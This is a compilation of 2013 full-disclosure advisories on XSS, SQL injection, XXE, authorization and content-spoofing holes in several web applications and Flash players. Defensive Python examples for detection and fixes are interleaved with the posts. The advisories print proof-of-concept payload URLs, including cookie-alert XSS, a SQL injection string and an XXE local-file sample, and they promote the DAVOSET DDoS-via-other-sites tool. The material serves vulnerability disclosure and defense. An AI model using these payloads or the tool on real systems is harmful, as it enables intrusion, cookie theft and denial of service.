http://websecurity.com.ua/uploads/2013/DAVOSET_v.1.1.3.rar

Use, don't abuse.

Among the improvements in the new version, in 1.1.3 support for cookies was added (for those web sites which protect themselves from automated attacks with cookies). Support for setting ports was also added. New services were also added into the full list of zombies (including a cookies-protected site).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Insufficient Authorization vulnerability in Act
Hello list!

This is an Insufficient Authorization vulnerability in Act. It is conference software written in Perl. Besides Insufficient Authorization, there are a lot of other vulnerabilities in Act.

Affected products:

Vulnerable are all versions of Act (they fixed this hole on July 27, 2013). The developers don't use version numbers for their software.

Affected vendors:

Act - A Conference Toolkit
http://act.mongueurs.net

Details:

Insufficient Authorization (WASC-02):
http://site/edittalk?talk_id=1

Any authenticated user can edit arbitrary talks (by setting the id), and also delete them (via the edit function). This vulnerability can be used to sabotage a conference by deleting all talks.

Timeline:

2013.07.14 - informed the organizers of YAPC::Europe 2013, on whose site I've found this and other holes. They ignored this and all the other holes at their site (which they had for 10 years while using Act), arguing that the developers of Act should do that and they don't care about the security of their site.
2013.07.14 - informed Act developers. They didn't answer.
2013.07.16 - announced at my site.
2013.07.27 - developers fixed this vulnerability (without answering or thanking) (https://github.com/book/Act/commit/e9c5257594f7eb69c4f935fb14fadb1bc79b46d7).
2013.08.29 - disclosed at my site (http://websecurity.com.ua/6657/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
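The Act hole is a missing object-level authorization check: edittalk acts on whatever talk_id the request names. As an added example, not Act's Perl code but a constructed Python model, the following shows the check applied in one place for both editing and deleting (the advisory notes that deletion is reached through the edit function), with a single NotAuthorized error for "no such talk", "already deleted" and "not your talk", so the error message does not let ids be probed. The users, talks and organizer role are constructed for the example.

```python
from dataclasses import dataclass


class NotAuthorized(Exception):
    """One error for 'no such talk' and 'not yours', so ids cannot be enumerated."""


@dataclass
class Talk:
    talk_id: int
    owner: str
    title: str
    deleted: bool = False


class TalkService:
    """Hypothetical talk store with ownership-based access control."""

    def __init__(self, talks, organizers):
        self.talks = {t.talk_id: t for t in talks}
        self.organizers = set(organizers)
        self.audit = []   # (action, talk_id, actor), for incident review

    def _authorize(self, talk_id, user):
        # Every mutating path goes through here: look the object up, then check
        # that the caller owns it or holds the organizer role.
        talk = self.talks.get(talk_id)
        if talk is None or talk.deleted:
            raise NotAuthorized()
        if talk.owner != user and user not in self.organizers:
            raise NotAuthorized()
        return talk

    def edit_talk(self, talk_id, user, new_title):
        talk = self._authorize(talk_id, user)
        talk.title = new_title
        self.audit.append(("edit", talk_id, user))
        return talk

    def delete_talk(self, talk_id, user):
        # Deletion is reachable from the edit screen, so it gets the same check.
        talk = self._authorize(talk_id, user)
        talk.deleted = True
        self.audit.append(("delete", talk_id, user))
        return True


def check(fn, *args):
    """True if the action was permitted, False if it was refused."""
    try:
        fn(*args)
        return True
    except NotAuthorized:
        return False


def build_service():
    talks = [Talk(1, "alice", "Perl on the wire"), Talk(2, "bob", "Testing with Act")]
    return TalkService(talks, organizers={"carol"})


def scenario():
    """Exercise the check from the owner's, another attendee's and an organizer's view."""
    svc = build_service()
    return {
        "bob_edits_alice": check(svc.edit_talk, 1, "bob", "hijacked"),
        "title_after": svc.talks[1].title,
        "alice_edits_own": check(svc.edit_talk, 1, "alice", "Perl on the wire, v2"),
        "alice_deletes_bob": check(svc.delete_talk, 2, "alice"),
        "organizer_deletes": check(svc.delete_talk, 2, "carol"),
        "edit_deleted": check(svc.edit_talk, 2, "bob", "resurrect"),
        "unknown_id": check(svc.edit_talk, 999, "alice", "x"),
        "audit": svc.audit,
    }
```

The audit list is the detection side of the same control: a burst of refused edits across consecutive talk_id values from one account is exactly the pattern the advisory's "delete all talks" scenario would leave, and it is only visible if refusals are recorded.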
[Full-disclosure] XSS and CS vulnerability in Soltech.CMS
Hello list!

Earlier I wrote about an SQL Injection vulnerability, and these are new holes in Soltech.CMS. There are Cross-Site Scripting and Content Spoofing vulnerabilities in Soltech.CMS. This is a commercial CMS.

Affected products:

Vulnerable are Soltech.CMS v 0.4 and previous versions.

Affected vendors:

Soltech
http://soltech.com.ua

Details:

The vulnerable version JW Player 4.2.90 is used in the system.

Cross-Site Scripting (WASC-08):
http://site/plugins/flashplayer/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
http://site/plugins/flashplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

Content Spoofing (WASC-12):
http://site/plugins/flashplayer/player.swf?file=1.flv&backcolor=0xFF&screencolor=0xFF
http://site/plugins/flashplayer/player.swf?file=1.flv&image=1.jpg
http://site/plugins/flashplayer/player.swf?config=1.xml
http://site/plugins/flashplayer/player.swf?abouttext=Player&aboutlink=http://websecurity.com.ua

Timeline:

2013.06.07 - informed developers about the first part of the vulnerabilities.
2013.07.13 - announced at my site.
2013.07.14 - informed developers about the second part of the vulnerabilities.
2013.08.27 - disclosed at my site (http://websecurity.com.ua/6653/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Vulnerabilities in multiple plugins for WordPress with GDD FLVPlayer
Hello list!

These are Content Spoofing and Cross-Site Scripting vulnerabilities in multiple web applications with GDD FLVPlayer.

Earlier I wrote about vulnerabilities in GDD FLVPlayer (http://seclists.org/fulldisclosure/2013/Aug/247). This is a video and audio player which is used at thousands of web sites and in multiple web applications. Among them are the following themes for WordPress: I Love It (I wrote about it earlier: http://seclists.org/fulldisclosure/2013/Jul/116), Megusta, Multipress, Lolzine, V1. This flash video and audio player is also used as a standalone web application in many custom themes and in different CMS (WordPress, Joomla) in non-theme folders.

Affected products:

Vulnerable are web applications which are using GDD FLVPlayer v3.635 and previous versions. Vulnerable are all versions of the following web applications: I Love It, Megusta, Multipress, Lolzine, V1.

Affected vendors:

GDD FLVPlayer was developed by GeDeDe.

GeDeDe
http://www.gdd.ro

Details:

XSS (via Flash Injection) (WASC-08):

I Love It:
http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf?splashscreen=xss.swf

Megusta:
http://site/wp-content/themes/megusta/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/megusta/flv/gddflvplayer.swf?splashscreen=xss.swf

Multipress:
http://site/wp-content/themes/multipress/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/multipress/flv/gddflvplayer.swf?splashscreen=xss.swf

Lolzine:
http://site/wp-content/themes/Lolzine/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/Lolzine/flv/gddflvplayer.swf?splashscreen=xss.swf

V1:
http://site/wp-content/themes/v1/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/v1/flv/gddflvplayer.swf?splashscreen=xss.swf

Full path disclosure (WASC-13):

All mentioned themes have FPD vulnerabilities in php-files (in index.php and others), which is typical for WP themes.

http://site/wp-content/themes/iloveit/
http://site/wp-content/themes/megusta/
http://site/wp-content/themes/multipress/
http://site/wp-content/themes/Lolzine/
http://site/wp-content/themes/v1/

In the last theme the path can be v1, v1.0, v1.3.5 and other variants. And at some web sites Jplayer (about whose multiple vulnerabilities I wrote earlier) is used instead of GDD FLVPlayer.

These are examples of XSS and FPD vulnerabilities; for examples of the 8 CS vulnerabilities, see the above-mentioned advisory.

I mentioned these vulnerabilities at my site (http://websecurity.com.ua/6731/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Vulnerabilities in multiple web applications with GDD FLVPlayer
Hello list!

These are Content Spoofing and Cross-Site Scripting vulnerabilities in multiple web applications with GDD FLVPlayer.

Earlier I wrote about vulnerabilities in GDD FLVPlayer (http://seclists.org/fulldisclosure/2013/Aug/247). This is a video and audio player which is used at thousands of web sites and in multiple web applications. Among them are Order Master Pro, CMS Pask (Pixelwerk admin), gddflvplayer for MODx, Pixelfind Administrator, WHMCompleteSolution, and other web applications. This flash video and audio player is also used at many web sites as a standalone web application.

Affected products:

Vulnerable are web applications which are using GDD FLVPlayer v3.635 and previous versions. Vulnerable are the following web applications:

Order Master Pro (all versions).
CMS Pask 3 (Pixelwerk admin v.3.3) and previous versions.
gddflvplayer for MODx (all versions).
Pixelfind Administrator (all versions).
WHMCompleteSolution (all versions).

Affected vendors:

GDD FLVPlayer was developed by GeDeDe.

GeDeDe
http://www.gdd.ro

Details:

XSS (via Flash Injection) (WASC-08):

Order Master Pro:
http://site/op/video/gddflvplayer.swf?mylogo=xss.swf
http://site/op/video/gddflvplayer.swf?splashscreen=xss.swf

CMS Pask 3 (Pixelwerk admin):
http://site/gddflvplayer.swf?mylogo=xss.swf
http://site/gddflvplayer.swf?splashscreen=xss.swf

gddflvplayer for MODx:
http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?mylogo=xss.swf
http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?splashscreen=xss.swf

Pixelfind Administrator:
http://site/includes/flash/gddflvplayer.swf?mylogo=xss.swf
http://site/includes/flash/gddflvplayer.swf?splashscreen=xss.swf

WHMCompleteSolution:
http://site/player/gddflvplayer.swf?mylogo=xss.swf
http://site/player/gddflvplayer.swf?splashscreen=xss.swf

These are examples of XSS vulnerabilities; for examples of the 8 CS vulnerabilities, see the above-mentioned advisory.

I mentioned these vulnerabilities at my site (http://websecurity.com.ua/6727/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] CS and XSS vulnerabilities in GDD FLVPlayer
Hello list!

These are Content Spoofing and Cross-Site Scripting vulnerabilities in GDD FLVPlayer.

Affected products:

Vulnerable are GDD FLVPlayer v3.635 and previous versions.

Affected vendors:

GeDeDe
http://www.gdd.ro

Details:

Content Spoofing (Flash Injection) (WASC-12):
http://site/gddflvplayer.swf?mylogo=http://site2/1.swf
http://site/gddflvplayer.swf?splashscreen=http://site2/1.swf

It's possible to include flash-files with links.

XSS (via Flash Injection) (WASC-08):
http://site/gddflvplayer.swf?mylogo=xss.swf
http://site/gddflvplayer.swf?splashscreen=xss.swf

In old versions of Flash player the attack will work with flash file xss.swf at any domain, in new versions - only at the same domain.

Content Spoofing (Content Injection) (WASC-12):
http://site/gddflvplayer.swf?mylogo=http://site2/1.jpg
http://site/gddflvplayer.swf?splashscreen=http://site2/1.jpg
http://site/gddflvplayer.swf?advert=http://site2/1.flv
http://site/gddflvplayer.swf?vdo=http://site2/1.flv

Injecting images and playing video and audio (flv, mp4 and mp3 files) from external sites.

Content Spoofing (Link Injection) (WASC-12):
http://site/gddflvplayer.swf?clickTAG=http://websecurity.com.ua
http://site/gddflvplayer.swf?vdo=http://site2/1.flv&endclipaction=http://websecurity.com.ua

Timeline:

2013.07.10 - announced at my site.
2013.07.11 - informed developers.
2013.08.23 - disclosed at my site (http://websecurity.com.ua/6642/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
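The SWF advisories on this page (mp3-player, flv-player, SWFUpload in InstantCMS, the JW Player bundled with Soltech.CMS and the GDD FLVPlayer family above) all come down to flashvars that accept a URL or markup without restriction. Because the player is a static file, the only server-side trace of abuse is the request line, so the practical defensive tool is log review. The Python below is an added example that belongs to none of those projects: it scans Apache combined-format access log lines for requests to .swf files whose query parameters carry an off-site URL, a data:/javascript: URI, HTML markup, or a reference to another .swf. The log lines are constructed, the hosts are placeholders, and the "off-site URL" heuristic assumes the site serves its own media from the same host, so tune that rule for a site that legitimately streams from a CDN.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed Apache "combined" log lines; hosts and paths are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Oct/2013:12:00:01 +0300] "GET /path/ump3player_500x70.swf?way=http://site2/1.mp3&skin=xss.swf HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [11/Oct/2013:12:00:02 +0300] "GET /gddflvplayer.swf?clickTAG=http://site2/landing HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.6 - - [11/Oct/2013:12:00:03 +0300] "GET /plugins/flashplayer/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg%3D%3D HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.6 - - [11/Oct/2013:12:00:04 +0300] "GET /path/ump3player_500x70.swf?way=http://site2&comment=test%3Cimg%20src=%27http://site2/1.jpg%27%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [11/Oct/2013:12:00:05 +0300] "GET /player.swf?file=videos/intro.flv&autostart=true HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [11/Oct/2013:12:00:06 +0300] "GET /index.php?redirect=http://site2/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SCRIPT_SCHEMES = ("javascript:", "data:", "vbscript:")


def suspicious_flashvars(target):
    """Reasons a request target for a .swf looks like flashvar injection; [] if clean."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(".swf"):
        return []
    reasons = []
    # Split by hand rather than parse_qsl so ';' inside a data: URI is not a separator.
    for pair in parts.query.split("&"):
        if not pair:
            continue
        key, _, raw = pair.partition("=")
        value = unquote_plus(raw).strip()
        low = value.lower()
        if low.startswith(SCRIPT_SCHEMES):
            reasons.append(f"{key}: script URI")
        elif low.startswith(("http://", "https://", "//")):
            reasons.append(f"{key}: off-site URL")
        if "<" in low or ">" in low:
            reasons.append(f"{key}: HTML markup")
        if low.split("?", 1)[0].endswith(".swf"):
            reasons.append(f"{key}: loads another SWF")
    return reasons


def scan_log(text):
    """Return one hit per suspicious line: its 1-based line number, target and reasons."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        match = LOG_RE.match(line)
        if not match:
            continue
        reasons = suspicious_flashvars(match.group("target"))
        if reasons:
            hits.append({"line": number, "target": match.group("target"), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["line"], hit["target"], "; ".join(hit["reasons"]))
```

The fifth and sixth sample lines are the controls: a same-origin media file with an ordinary boolean flashvar is not reported, and an off-site URL in a non-SWF request is out of scope for this rule. A hit on a production log is also a prompt to check whether the player version is one the advisories list, since upgrading or removing the SWF removes the sink entirely.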
[Full-disclosure] Vulnerabilities in Avaya IP Office Customer Call Reporter
Hello list!

I want to warn you about vulnerabilities in Avaya IP Office Customer Call Reporter. These are Remote HTML Include and Remote XSS Include (Cross-Site Scripting) vulnerabilities.

After I found multiple vulnerabilities in Avaya IP Office Customer Call Reporter in December, I informed ZDI about them (the critical ones). ZDI was very slow in processing these holes (regardless of my reminders) and only on the 30th of July did they begin actively working on them. I wrote about this case with ZDI in the WASC Mailing List (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-July/008883.html).

When Avaya ignored my informing in July and ZDI stopped working on this case in August (since Avaya was not responding to them either), I published these two vulnerabilities (the least critical). There are many other vulnerabilities, including critical holes which allow taking control over the admin panel, so Avaya still has a chance to get details of the vulnerabilities in their product before public disclosure.

- Affected products: -

Vulnerable are Avaya IP Office Customer Call Reporter 8.0.9.13 (tested in December 2012) and 9.0.0.0 (tested recently) and previous versions.

- Affected vendors: -

Avaya Inc.
http://www.avaya.com

-- Details: --

Remote HTML Include (Frame Injection) (WASC-12):

http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua

Remote XSS Include (Cross-Site Scripting) (WASC-08):

http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua/webtools/xss_r2.html

Timeline:

2012.12.06 - found multiple vulnerabilities (these ones and other critical holes).
2012.12.13 - informed ZDI about other critical vulnerabilities.
2012.12.18 - again informed ZDI about other critical vulnerabilities.
2013.01.27 - registered at zerodayinitiative.com and informed them through the site. ZDI started working on the case.
2013.07.28 - informed Avaya (via two contact forms) about these holes and other critical vulnerabilities, due to the slowness of ZDI.
2013.07.29 - wrote about ZDI in the WASC Mailing List.
2013.07.30 - if earlier ZDI only pretended they were working on the case, this time they started working actively on it (and tried to contact Avaya).
2013.08.07 - ZDI stopped working on the case and closed it, since Avaya was not responding.
2013.08.20 - disclosed at my site (http://websecurity.com.ua/6717/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] CS, XSS and FPD vulnerabilities in MCImageManager for TinyMCE
Hello list!

I want to warn you about vulnerabilities in Moxiecode Image Manager (MCImageManager). This is a commercial plugin for TinyMCE. It concerns MCImageManager itself as well as all web applications which have MCImageManager in their bundle. These are Content Spoofing, Cross-Site Scripting and Full Path Disclosure vulnerabilities.

About the Content Spoofing and Cross-Site Scripting vulnerabilities in flvPlayer I informed the developer already in October 2011 (it was part of the Media plugin for TinyMCE) and disclosed them in November. After my informing he fixed these holes in November 2011 in the Media plugin. But he forgot to fix them in the MCImageManager plugin.

- Affected products: -

Vulnerable are Moxiecode Image Manager 3.1.5 and previous versions.

- Affected vendors: -

Moxiecode
http://www.moxiecode.com

-- Details: --

Content Spoofing (WASC-12):

Flash-file flvPlayer.swf accepts arbitrary addresses in parameters flvToPlay and startImage, which allows spoofing the content of the flash, i.e. by setting addresses of video and/or image files from another site.

http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?autoStart=false&startImage=1.jpg
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv&autoStart=false&startImage=1.jpg

Flash-file flvPlayer.swf accepts arbitrary addresses in parameter flvToPlay, which allows spoofing the content of the flash, i.e. by setting the address of a playlist file from another site (parameters thumbnail and url in the xml-file accept arbitrary addresses).

http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.xml

File 1.xml:

XSS (WASC-08):

If at the site, at a page with flvPlayer.swf (with parameter jsCallback=true, or if there is a possibility to set this parameter for flv_player.swf), there is a possibility to include JS code with function flvStart() and/or flvEnd() (via HTML Injection), then it's possible to conduct an XSS attack. I.e. JS-callbacks can be used for an XSS attack.

Example of exploit:

function flvStart() { alert('XSS'); }
function flvEnd() { alert('XSS'); }
height="50%" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash">

Full Path Disclosure (WASC-13):

Full path in cookies MCManager_im_lastPath and MCManagerHistoryCookie_im.

Timeline:

2011.10.20 - informed developer of flvPlayer.
2011.10.20 - informed developer of TinyMCE (which is bundled with flvPlayer in the Media plugin).
2013.06.11 - announced at my site.
2013.06.13 - informed developer of MCImageManager.
2013.08.16 - disclosed at my site (http://websecurity.com.ua/6562/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] SQL Injection vulnerability in Soltech.CMS
Hello list!

There is a SQL Injection vulnerability in Soltech.CMS. This is a commercial CMS.

- Affected products: -

Vulnerable are Soltech.CMS v 0.4 and previous versions.

- Affected vendors: -

Soltech
http://soltech.com.ua

-- Details: --

SQL Injection (WASC-19):

http://site/index.php?level_path=%27%20or%20version()=5%23

Timeline:

2013.06.05 - announced at my site.
2013.06.07 - informed developers about the first part of the vulnerabilities.
2013.07.14 - informed developers about the second part of the vulnerabilities.
2013.08.13 - disclosed at my site (http://websecurity.com.ua/6550/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
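The advisory above gives only the injected level_path value. As an added example (not Soltech.CMS code and not from the post), the block below shows the defect class behind it and its fix side by side: a query built by string concatenation against a parameterized query. It uses sqlite3 so it runs offline; the table, rows and the payload are constructed for the demonstration, and the payload is the SQLite analogue of the post's MySQL `' or version()=5#` (SQLite has sqlite_version() and uses `--` for comments).

```python
"""Concatenated SQL vs. parameterized SQL, demonstrated with sqlite3.

Added example, not code from Soltech.CMS or from the advisory. Table contents
and the payload are constructed here.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build an in-memory table standing in for the CMS page/level table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE levels (id INTEGER PRIMARY KEY, level_path TEXT, title TEXT)"
    )
    conn.executemany(
        "INSERT INTO levels (level_path, title) VALUES (?, ?)",
        [("/", "Home"), ("/about", "About"), ("/secret", "Unpublished")],
    )
    return conn


def lookup_unsafe(conn: sqlite3.Connection, level_path: str) -> list:
    """The vulnerable pattern: the request parameter is pasted into SQL text,
    so a quote in the input ends the string literal and the rest is parsed
    as SQL."""
    sql = "SELECT title FROM levels WHERE level_path = '" + level_path + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, level_path: str) -> list:
    """The fix: a placeholder plus a bound parameter. The driver sends the
    input as a value; it is never parsed as SQL, whatever it contains."""
    return [
        row[0]
        for row in conn.execute(
            "SELECT title FROM levels WHERE level_path = ?", (level_path,)
        )
    ]


# Constructed payload: SQLite equivalent of the post's  ' or version()=5#
# The tautology makes the WHERE clause true for every row; '--' comments out
# the closing quote the application appends.
PAYLOAD = "' or sqlite_version()<>'5'--"

if __name__ == "__main__":
    db = make_db()
    print("normal  unsafe:", lookup_unsafe(db, "/about"))
    print("normal  safe:  ", lookup_safe(db, "/about"))
    print("payload unsafe:", lookup_unsafe(db, PAYLOAD))  # every row leaks
    print("payload safe:  ", lookup_safe(db, PAYLOAD))    # no row matches
```

The observable difference is the whole lesson: with the payload, `lookup_unsafe` returns every title in the table, including the unpublished one, while `lookup_safe` returns nothing because no level_path literally equals the payload string.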
[Full-disclosure] XXE Injection in Sybase EAServer
Hello!

I'll give you additional information concerning the advisory SEC Consult SA-20130719-0 :: Multiple vulnerabilities in Sybase EAServer (http://securityvulns.ru/docs29622.html). It's about XXE Injection in Sybase EAServer.

Among the vulnerabilities in EAServer there is XXE Injection, and only the local file inclusion and directory listing attack vector was mentioned. But this XXE Injection vulnerability also allows conducting attacks on other sites. So I'll supplement SEC Consult's advisory and bring your attention to another attack vector.

I wrote about such attacks in my 2012 article "Using XML External Entities (XXE) for attacks on other sites" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2012-August/008481.html) and my 2013 article "Using XXE vulnerabilities for attacks on other sites" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-August/008887.html). As I described in my articles, XXE vulnerabilities can be used for conducting CSRF and DoS attacks on other sites (and when using multiple web sites it's possible to conduct DDoS attacks). And last month I released a tool for conducting such attacks - in DAVOSET v.1.1.2 I added support of XML requests for XXE vulnerabilities.

XXE (WASC-43):

For the attack it's needed to send the next XML data in a POST request.

http://site/page";>]> &xxe; 0

So all servers with affected versions of Sybase EAServer can be used for attacks on other sites via XXE.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Using XXE vulnerabilities for attacks on other sites
Hello participants of Mailing List.

I'll tell you about using XXE vulnerabilities for attacks on other sites (I already wrote about it last year). Those who haven't read my 2012 article "Using XML External Entities (XXE) for attacks on other sites" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2012-August/008481.html) can do it now to refresh this topic for themselves. In that article I told about using XML External Entities (XXE) vulnerabilities (WASC-43) for conducting CSRF and DoS attacks on other sites. And in the new article I continued this topic.

In June I wrote a new article "Using XXE vulnerabilities for attacks on other sites", which I translated recently (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-August/008887.html). I described many new software and web applications which are vulnerable to XXE, such as libraptor, Advanced XML Reader, PHP 5.3 and 5.4, WordPress 3.5 and 3.5.1 and Sybase EAServer. And I mentioned my tool for automation of such attacks - DAVOSET, which can be used for conducting attacks on other sites via Abuse of Functionality vulnerabilities, and I was planning to add support of attacks via XXE.

Last month I released DAVOSET v.1.1.2 - DDoS attacks via other sites execution tool. In this version I added support of XML requests for XXE vulnerabilities. So now you can use XML External Entities (XXE) holes at web sites for conducting automated DoS and DDoS attacks on other sites.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
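Both this post and the Sybase EAServer post above describe the same server-side defect: an XML parser that resolves a SYSTEM entity from client-supplied XML, so the server fetches whatever URL or file the entity names. The block below is an added example (not code from the posts, from Sybase or from SEC Consult) of the parser-side control that removes that class: every external entity reference is refused before anything is fetched, and the attempted target is recorded so the event can be logged or alerted on. It uses Python's expat binding from the standard library; the sample documents and the host and file names in them are constructed placeholders.

```python
"""Refuse external entities when parsing XML from untrusted clients.

Added example, not code from any of the mailing-list posts or from Sybase.
The sample documents below are constructed for the demonstration.
"""
import xml.parsers.expat


class BlockedExternalEntity(Exception):
    """Raised when untrusted XML tries to pull in an external resource."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse client-supplied XML, refusing every external entity.

    Returns a dict:
      ok       - True only if the document parsed with no external reference
      elements - element names in document order (what a handler would use)
      blocked  - system identifiers (URLs or file paths) the document asked for
    """
    elements = []
    blocked = []

    def on_start(name, attrs):
        elements.append(name)

    def on_external_entity(context, base, system_id, public_id):
        # expat consults this handler *before* any fetch happens, so refusing
        # here is both the detection point and the mitigation. Nothing is
        # requested from system_id.
        blocked.append(system_id)
        raise BlockedExternalEntity(system_id)

    parser = xml.parsers.expat.ParserCreate()
    parser.StartElementHandler = on_start
    parser.ExternalEntityRefHandler = on_external_entity
    # Parameter entities (%name;) are never needed for application data;
    # keep them switched off so an external DTD subset is not loaded either.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    try:
        parser.Parse(data, True)
    except BlockedExternalEntity:
        return {"ok": False, "elements": elements, "blocked": blocked}
    except xml.parsers.expat.ExpatError as err:
        # Malformed input: reject, but it is not an XXE attempt.
        return {"ok": False, "elements": elements, "blocked": blocked, "error": str(err)}
    return {"ok": True, "elements": elements, "blocked": blocked}


# Constructed samples. The two XXE shapes are the ones the posts talk about:
# a remote URL (the server is made to issue a request to another site) and a
# local file (its contents would come back in the response).
BENIGN = b"<request><page>index</page></request>"
XXE_REMOTE = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE request [<!ENTITY xxe SYSTEM "http://site2/page">]>'
    b"<request><page>&xxe;</page></request>"
)
XXE_LOCAL = (
    b'<!DOCTYPE request [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b"<request>&xxe;</request>"
)

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("remote", XXE_REMOTE), ("local", XXE_LOCAL)):
        print(label, parse_untrusted_xml(doc))
```

The `blocked` list is what a defender wants in the application log: a server that should never parse a DOCTYPE from clients suddenly seeing SYSTEM identifiers pointing at other hosts is a direct indicator of the attack traffic these posts describe. If a deployment cannot change parser settings, the equivalent control is to reject any request body containing `<!DOCTYPE` before it reaches the parser.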
[Full-disclosure] XSS and FPD vulnerabilities in WPtouch and WPtouch Pro for WordPress
Hello list!

I want to inform you about vulnerabilities in WPtouch and WPtouch Pro plugins for WordPress. These are Cross-Site Scripting and Full path disclosure vulnerabilities. These XSS holes are in ZeroClipboard.swf, which is used in the plugin. In February I wrote about Cross-Site Scripting vulnerabilities in ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103) and in multiple web applications.

- Affected products: -

Vulnerable are all versions of plugins WPtouch and WPtouch Pro.

- Affected vendors: -

BraveNewCode
http://www.bravenewcode.com

-- Details: --

Cross-Site Scripting (WASC-08):

XSS via id parameter and XSS via copying payload into clipboard (as described in my advisory).

http://site/wp-content/plugins/wptouch-pro/admin/js/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Full path disclosure (WASC-13):

http://site/wp-content/plugins/wptouch/wptouch.php
http://site/wp-content/plugins/wptouch-pro/wptouch-pro.php

And other php-files in the plugin folder and subfolders.

http://site/wp-content/plugins/wptouch/error_log
http://site/wp-content/plugins/wptouch-pro/error_log

In the plugin folder and subfolders (at web sites where showing errors is off and they are saved into error_log).

Timeline:

2013.02.18 - informed old and new developers of ZeroClipboard.
2013.04.17 - announced at my site and later informed developers of WPtouch and WPtouch Pro.
2013.08.03 - disclosed at my site (http://websecurity.com.ua/6454/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] XSS and CS vulnerabilities in aCMS
Hello list!

After the previous Cross-Site Scripting, Content Spoofing, Information Leakage, Insufficient Authorization and Arbitrary File Uploading vulnerabilities in aCMS, here are new ones. These are Cross-Site Scripting and Content Spoofing vulnerabilities in aCMS. This is a commercial CMS.

- Affected products: -

Vulnerable are aCMS 1.0 and previous versions.

- Affected vendors: -

Almacor
http://almacor.ru

-- Details: --

Cross-Site Scripting (WASC-08):

http://site/assets/js/tiny_mce/plugins/images/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/assets/js/tiny_mce/plugins/images/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Content Spoofing (WASC-12):

http://site/assets/js/tiny_mce/plugins/images/js/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E
http://site/assets/js/tiny_mce/plugins/images/js/swfupload/swfupload.swf?buttonImageURL=http://demo.swfupload.org/v220/images/logo.gif

Timeline:

